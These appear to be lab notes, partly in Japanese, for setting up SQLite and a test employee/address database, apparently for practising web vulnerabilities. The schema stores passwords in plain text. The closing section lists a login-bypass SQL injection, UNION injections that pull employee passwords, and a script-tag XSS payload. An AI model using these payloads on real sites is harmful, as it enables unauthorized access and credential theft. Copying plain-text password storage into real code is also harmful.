﻿SQLite3 install

https://www.sqlite.org/download.html


$ pip install bottle-sqlite


$ cd %HOMEPATH%

$ mkdir sqlite3

設定＞システム＞詳細情報＞システムの詳細情報

ユーザ用PATHに以下を追加

%HOMEPATH%\sqlite3

$ where sqlite3



参照：https://marunouchi-tech.i-studio.co.jp/2023/


$ sqlite3

PRAGMA foreign_keys = ON;

.open --new test.db
.exit


$ sqlite3 test.db

PRAGMA foreign_keys = ON;

CREATE TABLE employee (
    id            integer primary key not null,
    name          text not null,
    mail          text not null,
	password      text not null,
    created_at    timestamp not null default (datetime('now', 'localtime')),
    updated_at    timestamp not null default (datetime('now', 'localtime'))
);

CREATE TRIGGER employee_update AFTER UPDATE ON employee
BEGIN
    UPDATE employee SET updated_at = (datetime('now', 'localtime')) WHERE id = new.id; 
END;


CREATE TABLE address (
    employee_id   integer primary key not null,
    address       text not null,
    created_at    timestamp not null default (datetime('now', 'localtime')),
    updated_at    timestamp not null default (datetime('now', 'localtime')),
    FOREIGN KEY(employee_id) REFERENCES employee(id)
);

CREATE TRIGGER address_update AFTER UPDATE ON address
BEGIN
    UPDATE address SET updated_at = (datetime('now', 'localtime')) WHERE employee_id = new.employee_id; 
END;







# login

a' or '1'='1


# search

1 OR 1 = 1 UNION SELECT employee_id, address, "" FROM address

1 OR 1 = 1 UNION SELECT employee_id, address, (SELECT password FROM employee WHERE id=employee_id) FROM address


# xss

<script>window.alert('お前は既にハッキングされている！');</script>
